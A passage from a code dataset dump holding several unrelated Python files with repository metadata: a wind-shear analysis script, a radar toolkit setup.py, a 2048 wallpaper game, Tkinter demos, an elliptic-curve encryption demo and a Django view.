Dataset('/data/rico/l.0003600.track.nc','r')\nricotrack72 = Dataset('/data/rico/l.0007200.track.nc','r')\nricotrack108 = Dataset('/data/rico/l.0010800.track.nc','r')\nricotrack144 = Dataset('/data/rico/l.0014400.track.nc','r')\nricotrack180 = Dataset('/data/rico/l.0018000.track.nc','r')\nricotrack216 = Dataset('/data/rico/l.0021600.track.nc','r')\nricotrack252 = Dataset('/data/rico/l.0025200.track.nc','r')\nricotrack288 = Dataset('/data/rico/l.0028800.track.nc','r')\nricotrack324 = Dataset('/data/rico/l.0032400.track.nc','r')\nricotrack360 = Dataset('/data/rico/l.0036000.track.nc','r')\nricotrack396 = Dataset('/data/rico/l.0039600.track.nc','r')\n\nricotrack612 = Dataset('/data/rico/l.0061200.track.nc','r')\nricotrack828 = Dataset('/data/rico/l.0082800.track.nc','r')\nricotrack900 = Dataset('/data/rico/l.0090000.track.nc','r')\nricotrack1008 = Dataset('/data/rico/l.0100800.track.nc','r')\nricotrack1116 = Dataset('/data/rico/l.0111600.track.nc','r')\nricotrack1224 = Dataset('/data/rico/l.0122400.track.nc','r')\nricotrack1332 = Dataset('/data/rico/l.0133200.track.nc','r')\nricotrack1440 = Dataset('/data/rico/l.0144000.track.nc','r')\nricotrack1548 = Dataset('/data/rico/l.0154800.track.nc','r')\nricotrack1656 = Dataset('/data/rico/l.0165600.track.nc','r')\nricotrack1764 = 
Dataset('/data/rico/l.0176400.track.nc','r')\nricotrack1872 = Dataset('/data/rico/l.0187200.track.nc','r')\nricotrack1980 = Dataset('/data/rico/l.0198000.track.nc','r')\n\nricotrack2016 = Dataset('/data/rico/l.0201600.track.nc','r')\nricotrack2052 = Dataset('/data/rico/l.0205200.track.nc','r')\nricotrack2088 = Dataset('/data/rico/l.0208800.track.nc','r')\nricotrack2124 = Dataset('/data/rico/l.0212400.track.nc','r')\nricotrack2160 = Dataset('/data/rico/l.0216000.track.nc','r')\n\n\n\narmd = Dataset(\"/data/arm/arm.default.0000000.nc\",\"r\")\narmql = Dataset(\"/data/arm/arm.ql.0000000.nc\",\"r\")\narmqlcore = Dataset(\"/data/arm/arm.qlcore.0000000.nc\",\"r\")\narmtrack108 = Dataset('/data/arm/l.0010800.track.nc','r')\narmtrack126 = Dataset('/data/arm/l.0012600.track.nc','r')\narmtrack144 = Dataset('/data/arm/l.0014400.track.nc','r')\narmtrack162 = Dataset('/data/arm/l.0016200.track.nc','r')\narmtrack180 = Dataset('/data/arm/l.0018000.track.nc','r')\narmtrack198 = Dataset('/data/arm/l.0019800.track.nc','r')\narmtrack216 = Dataset('/data/arm/l.0021600.track.nc','r')\narmtrack234 = Dataset('/data/arm/l.0023400.track.nc','r')\narmtrack252 = Dataset('/data/arm/l.0025200.track.nc','r')\narmtrack270 = Dataset('/data/arm/l.0027000.track.nc','r')\narmtrack288 = Dataset('/data/arm/l.0028800.track.nc','r')\n\narmtrack504 = Dataset('/data/arm/l.0050400.track.nc','r')\narmtrack522 = Dataset('/data/arm/l.0052200.track.nc','r')\n\n\nfilenames=[bomexd, ricod, armd]\n\nbomexfilenames=[bomextrack18, bomextrack36, bomextrack54, bomextrack72, bomextrack90, bomextrack108, bomextrack126, bomextrack144, bomextrack162, bomextrack180, bomextrack198, bomextrack216]\nricofilenames=[ricotrack36, ricotrack72, ricotrack108, ricotrack144, ricotrack180, ricotrack216, ricotrack252, ricotrack288, ricotrack324, ricotrack360, ricotrack396]\narmfilenames=[armtrack108, armtrack126, armtrack144, armtrack162, armtrack180, armtrack198, armtrack216, armtrack234, armtrack252, armtrack270, armtrack288]\n\n###########################################################################\n\n####################################\n \n# script\nfilenames=[ricod]\nbomexfilenames=[bomextrack342]\nricofilenames=[ricotrack828]\narmfilenames=[armtrack126]\nconditional_height=2000\n\n\n\nfor file in filenames:\n #zt=file.variables['z'][:]\n zh=file.variables['zh'][:]\n time_t=file.variables['time'][:]\n u=file.variables['u'][:,:]\n v=file.variables['v'][:,:]\n w=file.variables['w'][:,:]\n\n \n \n if file == ricod:\n for file1 in ricofilenames:\n ht=file1.variables['ht'][:]\n cb=file1.variables['cb'][:]\n ct=file1.variables['ct'][:]\n cv=file1.variables['cv'][:]\n cp=file1.variables['cp'][:]\n overlap_ratio=file1.variables['chr'][:]\n area_proj=file1.variables['area_proj'][:]\n nrcloud=file1.variables['nrcloud'][:,:,:]\n cfrac=file1.variables['cfrac'][:]\n zt=file1.variables['z'][:]\n xt=file1.variables['x'][:]\n yt=file1.variables['y'][:]\n nr=file1.variables['nr'][:]\n cld_mask=file1.variables['cld_mask'][:,:,:]\n \n \n nrcloudarray = np.ma.getdata(nrcloud) # unmask array\n dx=xt[1]-xt[0];dy=yt[1]-yt[0];dz=zt[1]-zt[0];\n gridarea=dx*dy\n gridvol=dx*dy*dz\n nx=xt.size;ny=yt.size;nz=zt.size;\n \n uv=np.zeros((time_t.size, zt.size))\n grad=np.zeros((time_t.size, zt.size))\n for t in range(time_t.size):\n unew=u[t,:]\n vnew=v[t,:]\n uv[t]=pyth(unew,vnew)\n grad[t]=np.gradient(uv[t])\n \n uv_z=np.mean(uv, axis=0) # average among different times\n grad_z=np.mean(grad, axis=0) # average among different times\n \n #uv_diff=np.zeros(zt.size -1)\n #for i in 
range(zt.size -1):\n # uv_diff[i] = uv_z[i+1] - uv_z[i]\n \n \n shear0 = ( uv_z[ct] - uv_z[cb] ) / 1\n shear1 = uv_z[ct] - uv_z[cb-1] # need to subtract 1 from cb OR add 1 to ct\n shear2 = uv_z[ct+1] - uv_z[cb] # need to subtract 1 from cb OR add 1 to ct\n shear3 = np.zeros(cb.size)\n #shear4 = np.zeros(cb.size)\n s1 = np.zeros(cb.size)\n A_T=np.zeros(cb.size)\n s2=np.zeros(cb.size)\n s3= ( ( (dz*ct)**2 - (dz*cb)**2 ) / ht**2 )**(1/4)\n for i in range(cb.size):\n shear3[i] = sum(grad_z[cb[i]:ct[i]+1]) / 1\n #shear4[i] = sum(uv_diff[cb[i]+1:ct[i]+1])\n if uv_z[ct[i]] >= uv_z[cb[i]]:\n s1[i]=2*dz*sum(uv_z[cb[i]:ct[i]+1]) / (ht[i]*ht[i])\n A_T[i]=dz*sum(uv_z[cb[i]:ct[i]+1])\n s2[i]= ( uv_z[ct[i]] - uv_z[cb[i]] )**2 / (2*dz*sum(uv_z[cb[i]:ct[i]+1]))\n elif uv_z[ct[i]] < uv_z[cb[i]]:\n s1[i]=-2*dz*sum(uv_z[cb[i]:ct[i]+1]) / (ht[i]*ht[i])\n A_T[i]=-dz*sum(uv_z[cb[i]:ct[i]+1]) \n \n index_shear=np.where(ht > 0)\n ht_shear=ht[index_shear[0]] # taking the ht values according to indices above\n overlap_ratio_shear=overlap_ratio[index_shear[0]];\n s1_shear= s1[index_shear[0]]\n s2_shear= s2[index_shear[0]]\n \n ### plot shear vs. overlap\n bins=dz\n \n plt.figure()\n plt.hist2d(overlap_ratio,shear3,bins=bins,cmin=0.5)\n plt.title('shear vs. overlap')\n colorbar = plt.colorbar()\n colorbar.set_label('counts in bin')\n \n plt.figure()\n plt.hist2d(overlap_ratio,shear0,bins=bins,cmin=0.5)\n plt.title('shear vs. overlap')\n colorbar = plt.colorbar()\n colorbar.set_label('counts in bin')\n \n plt.figure()\n plt.hist2d(overlap_ratio_shear,s1_shear,bins=bins,cmin=0.5)\n plt.title('shear vs. overlap')\n colorbar = plt.colorbar()\n colorbar.set_label('counts in bin')\n \"\"\"\n plt.figure()\n plt.hist2d(overlap_ratio_shear,s2_shear,bins=bins,cmin=0.5)\n plt.title('shear vs. 
overlap')\n colorbar = plt.colorbar()\n colorbar.set_label('counts in bin')\n \"\"\"\n\n###################################\n\nend= time.time()\nprint('Run Time in Seconds:', end-start)\n\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"thijsheus/overlap","sub_path":"scripts/windshear4.py","file_name":"windshear4.py","file_ext":"py","file_size_in_byte":10613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"166985823","text":"#!/usr/bin/env python\n\"\"\"Pyrad: Python Radar Toolkit\n\nPyrad is a Python module containing\nthe utilities that run the MeteoSwiss radar processing framework.\nIt is designed so that it accepts a growing number of radar data types.\nThe core of the processing is performed by the module Py-ART.\n\n\"\"\"\n\nimport os\nimport shutil\nimport sys\nimport re\nimport subprocess\nimport glob\nimport builtins\nfrom datetime import datetime\nimport getpass\nimport setuptools # for 'develop' mode\n\nDOCLINES = __doc__.split(\"\\n\")\n\nCLASSIFIERS = \"\"\"\\\nDevelopment Status :: 0 - Prototype\nIntended Audience :: Science/Research\nIntended Audience :: Developers\nLicense :: OSI Approved :: BSD License\nProgramming Language :: Python\nProgramming Language :: Python :: 3\nProgramming Language :: Python :: 3.6\nProgramming Language :: Python :: 3.7\nProgramming Language :: C\nProgramming Language :: Cython\nTopic :: Scientific/Engineering\nTopic :: Scientific/Engineering :: Atmospheric Science\nOperating System :: POSIX :: Linux\n\"\"\"\n\n\nNAME = 'pyrad_mch'\nMAINTAINER = \"MeteoSwiss Pyrad Developers\"\nMAINTAINER_EMAIL = \"jordi.figuerasiventura@meteoswiss.ch\"\nDESCRIPTION = DOCLINES[0]\nLONG_DESCRIPTION = \"\\n\".join(DOCLINES[2:])\nURL = \"https://github.com/meteoswiss-mdr/pyrad.git\"\nDOWNLOAD_URL = \"https://github.com/meteoswiss-mdr/pyrad.git\"\nLICENSE = 'BSD'\nCLASSIFIERS = filter(None, CLASSIFIERS.split('\\n'))\nPLATFORMS = [\"Linux\"]\nMAJOR = 0\nMINOR = 5\nMICRO = 0\nISRELEASED = True\nVERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)\nSCRIPTS = glob.glob('scripts/*')\nCOMPILE_DATE_TIME = datetime.utcnow().strftime(\"%Y-%m-%d %H:%M\")\nUSERNAME = getpass.getuser()\n\n\n# Return the git revision as a string\ndef git_version():\n def _minimal_ext_cmd(cmd):\n # construct minimal environment\n env = {}\n for k in ['SYSTEMROOT', 'PATH']:\n v = os.environ.get(k)\n if v is not None:\n env[k] = v\n # LANGUAGE is used on win32\n env['LANGUAGE'] = 'C'\n env['LANG'] = 'C'\n env['LC_ALL'] = 'C'\n out = subprocess.Popen(\n cmd, stdout=subprocess.PIPE, env=env).communicate()[0]\n return out\n\n try:\n out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])\n GIT_REVISION = out.strip().decode('ascii')\n except OSError as ee:\n GIT_REVISION = \"Unknown\"\n\n return GIT_REVISION\n\n# BEFORE importing distutils, remove MANIFEST. distutils doesn't properly\n# update it when the contents of directories change.\nif os.path.exists('MANIFEST'):\n os.remove('MANIFEST')\n\n# This is a bit hackish: we are setting a global variable so that the main\n# pyrad __init__ can detect if it is being loaded by the setup routine, to\n# avoid attempting to load components that aren't built yet. 
While ugly, it's\n# a lot more robust than what was previously being used.\nbuiltins.__PYRAD_SETUP__ = True\n\n\ndef write_version_py(filename='pyrad/version.py'):\n cnt = \"\"\"\n# THIS FILE IS GENERATED FROM PYRAD_PROC SETUP.PY\nshort_version = '%(version)s'\nversion = '%(version)s'\nfull_version = '%(full_version)s'\ngit_revision = '%(git_revision)s'\ncompile_date_time = '%(compile_date_time)s'\nusername = '%(username)s'\nrelease = %(isrelease)s\n\nif not release:\n version = full_version\n\"\"\"\n # Adding the git rev number needs to be done inside write_version_py(),\n # otherwise the import of pyrad.version messes up the build under Python 3.\n FULLVERSION = VERSION\n if os.path.exists('../../.git'):\n GIT_REVISION = git_version()\n elif os.path.exists('pyrad/version.py'):\n # must be a source distribution, use existing version file\n try:\n from pyrad.version import git_revision as GIT_REVISION\n except ImportError:\n raise ImportError(\"Unable to import git_revision. Try removing \"\n \"pyrad/version.py and the build directory \"\n \"before building.\")\n else:\n GIT_REVISION = \"Unknown\"\n\n if not ISRELEASED:\n FULLVERSION += '.dev+' + GIT_REVISION[:7]\n\n a = open(filename, 'w')\n try:\n a.write(cnt % {'version': VERSION,\n 'full_version': FULLVERSION,\n 'git_revision': GIT_REVISION,\n 'compile_date_time': COMPILE_DATE_TIME,\n 'username': USERNAME,\n 'isrelease': str(ISRELEASED)})\n finally:\n a.close()\n\n\ndef configuration(parent_package='', top_path=None):\n from numpy.distutils.misc_util import Configuration\n config = Configuration(None, parent_package, top_path)\n config.set_options(ignore_setup_xxx_py=True,\n assume_default_configuration=True,\n delegate_options_to_subpackages=True,\n quiet=True)\n\n config.add_subpackage('pyrad')\n config.add_data_files(('pyrad', '*.txt'))\n\n return config\n\n\ndef setup_package():\n\n # rewrite version file\n write_version_py()\n\n from numpy.distutils.core import setup\n\n setup(\n name=NAME,\n maintainer=MAINTAINER,\n maintainer_email=MAINTAINER_EMAIL,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n url=URL,\n version=VERSION,\n download_url=DOWNLOAD_URL,\n license=LICENSE,\n classifiers=CLASSIFIERS,\n platforms=PLATFORMS,\n configuration=configuration,\n scripts=SCRIPTS,\n )\n\nif __name__ == '__main__':\n setup_package()\n","repo_name":"meteoswiss-mdr/pyrad","sub_path":"src/pyrad_proc/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5442,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"21869222456","text":"import os\r\nimport random\r\nimport tempfile\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nimport keyboard\r\nimport ctypes\r\nimport time\r\n\r\nBACKGROUND_PATH = os.path.join(tempfile.gettempdir(), \"2048.png\")\r\n\r\ndef new_board(size=4):\r\n return [[0] * size for _ in range(size)]\r\n\r\ndef add_new_tile(board, size=4):\r\n empty_tiles = [(x, y) for x in range(size) for y in range(size) if board[x][y] == 0]\r\n if empty_tiles:\r\n x, y = random.choice(empty_tiles)\r\n board[x][y] = random.choices([2, 4], weights=[0.75, 0.25])[0]\r\n elif not has_possible_combinations(board):\r\n img = render_board(board, game_over=True)\r\n set_wallpaper(img)\r\n print(\"Game Over... 
Restarting game...\")\r\n time.sleep(5)\r\n main()\r\n\r\ndef has_possible_combinations(board):\r\n for row in board:\r\n if 0 in row:\r\n return True\r\n for i in range(len(board)):\r\n for j in range(len(board[0]) - 1):\r\n if board[i][j] == board[i][j + 1] or board[j][i] == board[j + 1][i]:\r\n return True\r\n\r\n return False\r\n\r\ndef move_row_left(row):\r\n non_zeros = [x for x in row if x != 0]\r\n new_row = []\r\n skip = False\r\n\r\n for i in range(len(non_zeros)):\r\n if skip:\r\n skip = False\r\n continue\r\n\r\n if i < len(non_zeros) - 1 and non_zeros[i] == non_zeros[i + 1]:\r\n new_row.append(2 * non_zeros[i])\r\n skip = True\r\n else:\r\n new_row.append(non_zeros[i])\r\n\r\n return new_row + [0] * (len(row) - len(new_row))\r\n\r\ndef move_board(board, direction):\r\n size = len(board)\r\n if direction == 'left':\r\n board = [move_row_left(row) for row in board]\r\n elif direction == 'right':\r\n board = [move_row_left(row[::-1])[::-1] for row in board]\r\n elif direction == 'up':\r\n board = [list(row) for row in zip(*[move_row_left(row) for row in zip(*board)])]\r\n elif direction == 'down':\r\n board = [list(row) for row in zip(*[move_row_left(row[::-1])[::-1] for row in zip(*board)])]\r\n return board\r\n\r\ndef tile_color(value):\r\n colors = {\r\n 2: (238, 228, 218),\r\n 4: (237, 224, 200),\r\n 8: (242, 177, 121),\r\n 16: (245, 149, 99),\r\n 32: (246, 124, 95),\r\n 64: (246, 94, 59),\r\n 128: (237, 207, 114),\r\n 256: (237, 204, 97),\r\n 512: (237, 200, 80),\r\n 1024: (237, 197, 63),\r\n 2048: (237, 194, 46),\r\n }\r\n return colors.get(value, (205, 193, 180))\r\n\r\ndef draw_game_over(img, game_over=False):\r\n if game_over:\r\n draw = ImageDraw.Draw(img)\r\n text = \"Game over\"\r\n font = ImageFont.truetype(\"arial.ttf\", 60)\r\n text_bbox = draw.textbbox((0, 0), text, font=font)\r\n w, h = text_bbox[2] - text_bbox[0], text_bbox[3] - text_bbox[1]\r\n draw.text(\r\n ((img.width - w) // 2, (img.height - h) // 2),\r\n text,\r\n font=font,\r\n fill=(0, 0, 0, 128),\r\n stroke_width=2,\r\n stroke_fill=(255, 255, 255, 128)\r\n )\r\n\r\ndef render_board(board, size=4, tile_size=100, background_color=(187, 173, 160), game_over=False):\r\n img_size = size * tile_size\r\n img = Image.new('RGBA', (img_size, img_size), background_color)\r\n draw = ImageDraw.Draw(img)\r\n\r\n for x in range(size):\r\n for y in range(size):\r\n value = board[y][x]\r\n if value:\r\n draw.rectangle(\r\n [x * tile_size, y * tile_size, (x + 1) * tile_size, (y + 1) * tile_size],\r\n fill=tile_color(value),\r\n outline=(197, 173, 160),\r\n width=2\r\n )\r\n text = str(value)\r\n font = ImageFont.truetype(\"arial.ttf\", 40)\r\n text_bbox = draw.textbbox((0, 0), text, font=font)\r\n w, h = text_bbox[2] - text_bbox[0], text_bbox[3] - text_bbox[1]\r\n draw.text(\r\n (x * tile_size + (tile_size - w) // 2, y * tile_size + (tile_size - h) // 2),\r\n text,\r\n font=font,\r\n fill='black' if value < 8 else 'white'\r\n )\r\n draw_game_over(img, game_over)\r\n return img\r\n\r\ndef set_wallpaper(img):\r\n img.save(BACKGROUND_PATH)\r\n ctypes.windll.user32.SystemParametersInfoW(20, 0, BACKGROUND_PATH, 3)\r\n\r\ndef main():\r\n board = new_board()\r\n add_new_tile(board)\r\n add_new_tile(board)\r\n\r\n while True:\r\n img = render_board(board)\r\n set_wallpaper(img)\r\n\r\n if keyboard.is_pressed('left'):\r\n board = move_board(board, 'left')\r\n add_new_tile(board)\r\n elif keyboard.is_pressed('right'):\r\n board = move_board(board, 'right')\r\n add_new_tile(board)\r\n elif keyboard.is_pressed('up'):\r\n board = 
move_board(board, 'up')\r\n add_new_tile(board)\r\n elif keyboard.is_pressed('down'):\r\n board = move_board(board, 'down')\r\n add_new_tile(board)\r\n elif keyboard.is_pressed('R'):\r\n main()\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Game started\")\r\n main()\r\n","repo_name":"ImPavloh/2048-Wallpaper-Edition","sub_path":"2048.py","file_name":"2048.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16690835375","text":"#程序文件ex11_9.py\r\nimport numpy as np\r\nimport sympy as sp\r\nfrom numpy.linalg import inv\r\nf = open('data11_9.txt'); d = f.readlines()\r\na = []; b = []\r\nfor i in range(2): a.extend(d[i].split())\r\na = np.array([eval(e) for e in a]).reshape(2,-1)\r\nmu1 = a.mean(axis=1, keepdims=True); s1 = np.cov(a, ddof=1)\r\nfor i in range(2,4): b.extend(d[i].split())\r\nb = np.array([eval(e) for e in b]).reshape(2,-1)\r\nmu2 = b.mean(axis=1, keepdims=True); s2 = np.cov(b, ddof=1)\r\nsp.var('x1,x2'); X = sp.Matrix([x1, x2]) #X为列向量\r\nd1 = (X-mu1).T@inv(s1)@(X-mu1)\r\nd1 = sp.expand(d1)\r\nd2 = (X-mu2).T@inv(s2)@(X-mu2)\r\nd2 = sp.expand(d2)\r\nW = sp.lambdify('x1,x2', d1-d2, 'numpy')\r\nsol = W(np.array([1.24,1.28,1.40]), np.array([1.80,1.84,2.04]))\r\ncheck1 = W(a[0], a[1]); check2 = W (b[0], b[1])\r\nprint(np.round(sol,4)) #输出3个判别函数值\r\n","repo_name":"LuyuZhang00/CUMCM2022","sub_path":"python数学建模算法与应用/11第11章 聚类分析与判别分析模型/ex11_9.py","file_name":"ex11_9.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"38607645238","text":"import tkinter as tk\n\nclass Dice_Roll_GUI:\n\n def __init__(self):\n self.root = tk.Tk()\n self.root.rowconfigure([0,1], minsize=300, weight=1)\n self.root.columnconfigure(0, minsize=300, weight=1)\n\n self.rollBtn = tk.Button(self.root, text=\"Roll\", font=(\"Arial\", 20), command=self.roll, relief=\"raised\")\n self.rollBtn.grid( row=0, sticky=\"nswe\")\n\n #lbl can be empty, i.e. 
without text\n self.result_lbl = tk.Label(self.root, text=\"ROLL ME!\", font=(\"Arial\", 20))\n self.result_lbl.grid( row=1, sticky=\"nswe\")\n\n self.root.mainloop()\n\n def roll(self):\n #uses random to roll a six-sided dice with different colours on each side \n import random\n colours = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\n val = random.randrange(1,7)\n self.result_lbl[\"text\"] = str(val)\n self.result_lbl[\"background\"] = colours[val-1]\n\nDice_Roll_GUI()","repo_name":"AaronYin5758/Tkinter","sub_path":"dice_roll.py","file_name":"dice_roll.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9762057013","text":"'''\nвиджеты\nmenu ..\ntext\n wrap - перенос по буквам or по словам\n insertbackground- цвет курсора\n selectbackground - цвет выделения\n ызфсштп1\\ызфсштп2\\spacing3 - м\nScrollbar привязать не только к текстовой области но и квиджеу\n связь scrollbar с текстовым полем по нужной оси\n'''\n\nfrom tkinter import *\nroot = Tk()\nroot.geometry('800x600+500+200')\n\nf_menu = Frame(root, bg=\"#1F252A\", height=40)\nf_text = Frame(root)\nf_menu.pack(fill=X)\nf_text.pack(fill=BOTH,expand=1)\n\nl_menu = Label(f_menu, text=\"Menu\", bg=\"#2B3239\", fg=\"#C6DEC1\", font=\"Arial 10\")\nl_menu.place(x=10, y=10)\n\nt = Text(f_text, bg=\"#343D46\", fg=\"#C6DEC1\", padx=10, pady=10, wrap=WORD,\n insertbackground=\"#EDA756\", selectbackground=\"#4E5A65\", spacing3=10)\nt.pack(fill=BOTH,expand=1, side=LEFT)\n\nscroll = Scrollbar(f_text, command=t.yview)\nscroll.pack(fill=Y, side=LEFT)\nt.config(yscrollcommand=scroll.set)# настроенный скролл сюда подставляем\nroot.mainloop()","repo_name":"LizaPleshkova/PythonLessonsPart2","sub_path":"venv/lessons/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28898364617","text":"# https://leetcode.com/problems/partition-array-for-maximum-sum/description/\n# https://leetcode.com/problems/partition-array-for-maximum-sum/solutions/290863/java-c-python-dp-o-k-space/\n\n\n# bottom-up dp, TC:O(NM), SC:O(N)\ndef maxSumAfterPartitioning(arr: List[int], k: int) -> int:\n # dp[i]: max sum of arr[:i+1]\n n = len(arr)\n dp = [0] * (n + 1)\n for i in range(1, n + 1):\n value = 0\n for j in range(1, min(i, k) + 1):\n value = max(value, arr[i - j])\n dp[i] = max(dp[i], value * j + dp[i - j])\n return dp[-1]\n\n\n# bottom-up dp, TC:O(NM), SC:O(N)\ndef maxSumAfterPartitioning2(arr: List[int], k: int) -> int:\n # dp[i]: max sum of arr[:i]\n n = len(arr)\n dp = [0] * (n + 1)\n for i in range(1, n+1):\n value = arr[i-1]\n dp[i] = dp[i-1] + value\n for j in range(2, min(i, k)+1): # update max value\n value = max(value, arr[i-j])\n dp[i] = max(dp[i], value * j + dp[i-j])\n return dp[-1]","repo_name":"ychanc2104/LeetCode","sub_path":"Partition Array for Maximum Sum.py","file_name":"Partition Array for Maximum Sum.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73770723368","text":"import torch\nimport os\n\nclass ONNX_util:\n\n @staticmethod\n def save_yolact(model,dataset, file_name, verbose=True):\n if(os.path.isfile(file_name) ):\n os.remove(file_name)\n dummy_input= list(range(len(dataset)))[0]\n img, gt, gt_masks, h, w, num_crowd = dataset.pull_item(dummy_input)\n batch = img.unsqueeze(0)\n batch = 
batch.cuda()\n\n torch.onnx.export(model, (batch), file_name, verbose,opset_version=11)","repo_name":"h-aboutalebi/yolact_min","sub_path":"utils/onnx_util.py","file_name":"onnx_util.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9626516017","text":"# Elliptic Curve Cryptographic system\n# uses curve P-256 as default for generating private key\n\nimport os\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import ec\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n\n\nclass EllipticCurveSystem:\n\n def __init__(self, private_key=None):\n if private_key is None:\n private_key = ec.generate_private_key(ec.SECP256R1())\n\n self.private_key = private_key\n self.public_key = private_key.public_key()\n\n def create_pem(self) -> bytes:\n pem = self.public_key.public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo\n )\n return pem\n\n def derive_shared_secret(self, peer_public_key, salt=None) -> tuple[bytes, bytes]:\n \"\"\"Derive shared secret using Elliptic-curve Diffie-Hellman (ECDH)\"\"\"\n if salt is None:\n salt = os.urandom(16)\n shared_secret = self.private_key.exchange(ec.ECDH(), peer_public_key)\n derived_key = PBKDF2HMAC(\n algorithm=hashes.SHA256(),\n length=32,\n salt=salt,\n iterations=100000,\n ).derive(shared_secret)\n return salt, derived_key\n\n def encrypt_message(self, peer_public_key, message: bytes) -> tuple[bytes, bytes, bytes, bytes]:\n \"\"\"Encrypt a message using a symmetric key derived from a shared secret.\"\"\"\n salt, symmetric_key = self.derive_shared_secret(peer_public_key)\n nonce = os.urandom(16)\n cipher = Cipher(algorithms.AES(symmetric_key), modes.GCM(nonce))\n encryptor = cipher.encryptor()\n ciphertext = encryptor.update(message) + encryptor.finalize()\n\n return (salt, nonce, ciphertext, encryptor.tag)\n\n def decrypt_message(\n self,\n peer_public_key: bytes,\n salt: bytes,\n nonce: bytes,\n ciphertext: bytes,\n tag: bytes\n ) -> str:\n \"\"\"Decrypt a message using a symmetric key derived from a shared secret.\"\"\"\n _, symmetric_key = self.derive_shared_secret(peer_public_key, salt)\n cipher = Cipher(algorithms.AES(symmetric_key), modes.GCM(nonce, tag))\n decryptor = cipher.decryptor()\n plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n return plaintext.decode(\"utf-8\")\n\n def sign_message(self, message: bytes) -> bytes:\n signature = self.private_key.sign(\n message,\n ec.ECDSA(hashes.SHA256())\n )\n return signature\n\n def verify_signature(self, message: bytes, signature: bytes):\n try:\n self.public_key.verify(\n signature,\n message,\n ec.ECDSA(hashes.SHA256())\n )\n print(\"The signature is valid!\")\n except Exception as e:\n print(e.__class__.__name__)\n print(\"The signature is invalid!\")\n\n\n\nif __name__ == \"__main__\":\n\n # Two parties want to speak in secret: \n message = \"foo bar\".encode(\"utf-8\")\n ecc = EllipticCurveSystem()\n ecc_peer = EllipticCurveSystem()\n\n # Generate the shared secret to encrypt messages with:\n peer_public_key_serialized = ecc_peer.create_pem()\n peer_public_key = serialization.load_pem_public_key(peer_public_key_serialized)\n shared_secret = ecc.derive_shared_secret(peer_public_key)\n\n # Encrypt the message:\n encrypted_msg = 
ecc.encrypt_message(peer_public_key, message)\n\n # Decrypt the message:\n decrypted_msg = ecc.decrypt_message(\n peer_public_key=peer_public_key,\n salt=encrypted_msg[0],\n nonce=encrypted_msg[1],\n ciphertext=encrypted_msg[2],\n tag=encrypted_msg[3])\n\n print(decrypted_msg)\n","repo_name":"FirstFlush/crypto","sub_path":"ecc.py","file_name":"ecc.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32290871673","text":"from django.views.generic import ListView, DetailView\nfrom django.db.models import Avg\nfrom .model import Subject\nfrom ..evaluation.model import Evaluation\nfrom ..evaluation.forms import ExperienceForm, RateForm, CommentForm\n\nclass SubjectDetail(DetailView):\n model = Subject\n template_name = 'subject/details.html'\n context_object_name = 'materia'\n\n def post(self, request, *args, **kwargs):\n mat = self.get_object()\n\n experience_form = ExperienceForm(request.POST, prefix='experience_form')\n comment_form = CommentForm(request.POST, prefix='comment_form')\n rate_form = RateForm(request.POST, prefix='rate_form')\n\n exist = Evaluation.objects.filter(user=self.request.user).first()\n\n if experience_form.is_valid() and 'submit_experience' in request.POST:\n if exist:\n exist.professor = experience_form.cleaned_data['professor']\n exist.learning = experience_form.cleaned_data['learning']\n exist.difficult = experience_form.cleaned_data['difficult']\n exist.punctuality = experience_form.cleaned_data['punctuality']\n exist.save()\n else:\n experience = experience_form.save(commit=False)\n experience.subject = mat\n experience.user = self.request.user\n experience.save()\n return self.get(request, *args, **kwargs)\n\n if comment_form.is_valid() and 'submit_comment' in request.POST:\n if exist:\n exist.comment = comment_form.cleaned_data['comment']\n exist.save()\n else:\n comment = comment_form.save(commit=False)\n comment.subject = mat\n comment.user = self.request.user\n comment.save()\n return self.get(request, *args, **kwargs)\n\n if rate_form.is_valid() and 'submit_rate' in request.POST:\n if exist:\n exist.complexity = rate_form.cleaned_data['complexity']\n exist.save()\n else:\n rate = rate_form.save(commit=False)\n rate.subject = mat\n rate.user = self.request.user\n rate.save()\n return self.get(request, *args, **kwargs)\n\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = \"Detalles\"\n context['subtitle'] = \"Materia\"\n\n i = context['materia']\n i.count = Evaluation.objects.filter(subject=i).count()\n avg_complexity = Evaluation.objects.filter(subject=i).aggregate(avg_complexity=Avg('complexity'))\n i.avg = 